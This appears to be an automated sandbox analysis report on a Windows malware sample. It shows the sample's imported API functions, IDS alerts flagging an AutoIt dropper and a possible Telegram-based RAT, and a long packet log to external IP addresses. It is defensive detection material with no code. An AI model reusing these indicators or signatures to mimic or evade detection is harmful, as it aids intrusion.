                                                                                                                                                                                                                                                          GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                                                                                                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                                                                                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                                                                                                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                                                                                                                                                          OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                          EnglishGreat Britain
                                                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                          2024-11-29T10:57:11.769478+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:11.769478+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:14.183543+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:14.183543+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:20.485145+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449741104.16.184.24180TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:29.778769+01002029323ET MALWARE Possible Generic RAT over Telegram API1192.168.2.449748149.154.167.220443TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:31.307649+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:31.307649+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:31.713755+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:31.713755+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:53.448959+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:53.448959+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:53.857531+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:57:53.857531+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:58:15.592309+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:58:15.592309+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:58:15.999747+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:58:15.999747+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:58:37.702732+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:58:37.702732+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:58:38.114926+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:58:38.114926+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:58:59.824195+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:58:59.824195+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:59:00.231281+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731188.138.68.21280TCP
                                                                                                                                                                                                                                                          2024-11-29T10:59:00.231281+01002834392ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check1192.168.2.449731188.138.68.21280TCP

                                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:08.695184946 CET497308702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:08.815164089 CET870249730192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:08.815280914 CET497308702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.286639929 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.427573919 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.427666903 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.428119898 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.623941898 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.678247929 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.678287029 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.678354025 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.678845882 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.678884029 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.678930044 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.679107904 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.679116011 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.679166079 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.679898977 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.679950953 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.679995060 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.680005074 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.680017948 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.680053949 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.680141926 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.680161953 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.680224895 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.704961061 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705013990 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705014944 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705034018 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705071926 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705087900 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705162048 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705200911 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705641985 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705647945 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705653906 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.705660105 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.767261982 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.769478083 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.784029961 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.784068108 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.785407066 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.800906897 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.800923109 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.923239946 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.923343897 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.930332899 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.930351973 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.930627108 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.962233067 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.962347984 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.971091986 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.971200943 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.971831083 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.976237059 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.976363897 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.984330893 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.984363079 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.984647036 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.985645056 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.985716105 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.987610102 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.987632990 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.987893105 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.987905025 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.987934113 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.988140106 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.008105040 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.008187056 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.034348011 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.035331964 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.049983025 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.164031029 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.164061069 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.164295912 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.224194050 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.357299089 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.357677937 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.358159065 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.359052896 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.361587048 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.395200014 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.395222902 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.395450115 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.396357059 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.399338007 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.403330088 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.403335094 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.403346062 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.407337904 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.443326950 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.673494101 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.674457073 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.674536943 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.681587934 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.681683064 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.681745052 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.682566881 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686558962 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686599016 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686618090 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686641932 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686677933 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686682940 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686717987 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.688131094 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.688246965 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.688462973 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.690316916 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696834087 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696872950 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696896076 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696913958 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696928024 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696976900 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.697465897 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.697597027 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.699701071 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.699764013 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.700016975 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.729471922 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.730590105 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.730650902 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.731056929 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.238050938 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.238146067 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.320524931 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.320557117 CET44349739149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.320648909 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.321096897 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.321108103 CET44349739149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.358839035 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.358867884 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.359106064 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.359179020 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.362778902 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.403331995 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.775348902 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.775372982 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.775405884 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.775440931 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.775473118 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.776473999 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.776494026 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.782089949 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.902146101 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.183336973 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.183542967 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.189599037 CET497308702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.309593916 CET870249730192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.742271900 CET44349739149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.742362022 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.744539976 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.744544983 CET44349739149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.744733095 CET44349739149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.787331104 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.814034939 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.855339050 CET44349739149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:15.275739908 CET44349739149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:15.275796890 CET44349739149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:15.275840998 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:15.276849985 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:16.112958908 CET4974080192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:16.236709118 CET8049740104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:16.236826897 CET4974080192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:16.237080097 CET4974080192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:16.356956959 CET8049740104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:17.333091974 CET8049740104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:17.336764097 CET4974080192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:17.457789898 CET8049740104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:17.457865000 CET4974080192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.178798914 CET4974180192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.298943043 CET8049741104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.299369097 CET4974180192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.299601078 CET4974180192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.419661999 CET8049741104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.705260992 CET49742443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.705316067 CET4434974245.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.705605984 CET49742443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.706113100 CET49742443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.706129074 CET4434974245.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:20.484688044 CET8049741104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:20.485145092 CET4974180192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:20.605622053 CET8049741104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:20.605689049 CET4974180192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.134870052 CET4434974245.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.135062933 CET49742443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.138892889 CET49742443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.138900995 CET4434974245.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.139100075 CET4434974245.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.145464897 CET49742443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.187325954 CET4434974245.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.819904089 CET4434974245.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.819960117 CET4434974245.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.820035934 CET49742443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:21.820861101 CET49742443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:22.327603102 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:22.327621937 CET4434974331.14.70.249192.168.2.4
